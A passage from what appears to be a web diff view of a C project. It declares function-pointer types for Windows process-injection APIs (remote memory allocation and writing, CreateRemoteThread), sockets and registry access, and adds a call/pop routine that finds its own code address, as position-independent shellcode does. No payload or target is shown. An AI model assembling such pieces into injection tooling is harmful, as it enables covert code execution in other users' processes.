typedef void *(*create_thread)(void *attributes, size_t stackSz, void *startFunc, void *param, uint32_t flags, uint32_t *id)__attribute__((stdcall));
|
||||
|
||||
//process manipulation
|
||||
typedef int (*create_process)(char *app, char *cmd, void *secAttr, void *threadAttr, int inheritHandle, uint32_t creationFlags, void *env, char *currentDir, void *startupInfo, void *procInfo)__attribute__((stdcall));
|
||||
|
||||
typedef void *(*open_process)(uint32_t perms, int inherit, uint32_t pid)__attribute__((stdcall));
|
||||
|
||||
typedef int (*enum_processes)(uint32_t *procs, uint32_t sz, uint32_t *retSz)__attribute__((stdcall));
|
||||
|
||||
typedef uint32_t (*get_module_filename_ex)(void *proc, void *mod, char *buf, uint32_t bufSz)__attribute__((stdcall));
|
||||
|
||||
typedef void *(*virtual_alloc_ex)(void *proc, /*opt*/void *startAddr, size_t sz, uint32_t allocType, uint32_t protect)__attribute__((stdcall));
|
||||
|
||||
typedef int (*virtual_free_ex)(void *proc, void *addr, size_t sz, uint32_t type)__attribute__((stdcall));
|
||||
|
||||
|
||||
typedef int (*write_process_memory)(void *proc, void *destAddr, void *srcBuf, size_t sz, size_t *szWritten)__attribute__((stdcall));
|
||||
|
||||
typedef void *(*create_remote_thread)(void *proc, void *secAttrs, size_t stackSz, void *entry, void *param, uint32_t flags, uint32_t *tid)__attribute__((stdcall));
|
||||
|
||||
|
||||
//sockets
|
||||
typedef int (*wsa_startup)(uint16_t, void *)__attribute__((stdcall));
|
||||
|
||||
typedef int (*fp_socket)(int af, int type, int proto)__attribute__((stdcall));
|
||||
|
||||
//void = sockaddr
|
||||
typedef int (*fp_connect)(int sock, void *name, int nameLen)__attribute__((stdcall));
|
||||
|
||||
typedef int (*wsa_cleanup)(void)__attribute__((stdcall));
|
||||
|
||||
typedef int (*fp_send)(int sock, const char *buf, int len, int flags)__attribute__((stdcall));
|
||||
|
||||
typedef int (*fp_recv)(int sock, char *buf, int len, int flags)__attribute__((stdcall));
|
||||
|
||||
typedef int (*s_close)(int sock)__attribute__((stdcall));
|
||||
|
||||
//registry:
|
||||
typedef long (*reg_open_key_ex_a)(void *hkey, char *subKey, uint32_t options, uint32_t samDesire, void **result)__attribute__((stdcall));
|
||||
|
||||
typedef long (*reg_get_value_a)(void *hkey, char *subKey, char *value, uint32_t flags, uint32_t *type, void *data, uint32_t *dataSz)__attribute__((stdcall));
|
||||
|
||||
typedef long (*reg_close_key)(void *hkey)__attribute__((stdcall));
|
||||
|
||||
//errors:
|
||||
|
||||
typedef uint32_t (*get_last_error)()__attribute__((stdcall));
|
||||
|
||||
#endif
|
||||
#endif
|
|
@ -0,0 +1,17 @@
|
|||
#include "zzz.h"
|
||||
|
||||
void *end() {
|
||||
void *end;
|
||||
|
||||
__asm__("call nextIns;\r\n"
|
||||
"nextIns:\r\n"
|
||||
"pop %0\r\n"
|
||||
: "=r" (end)
|
||||
:
|
||||
:);
|
||||
|
||||
end += 16;
|
||||
|
||||
return end;
|
||||
}
|
||||
|
Loading…
Reference in New Issue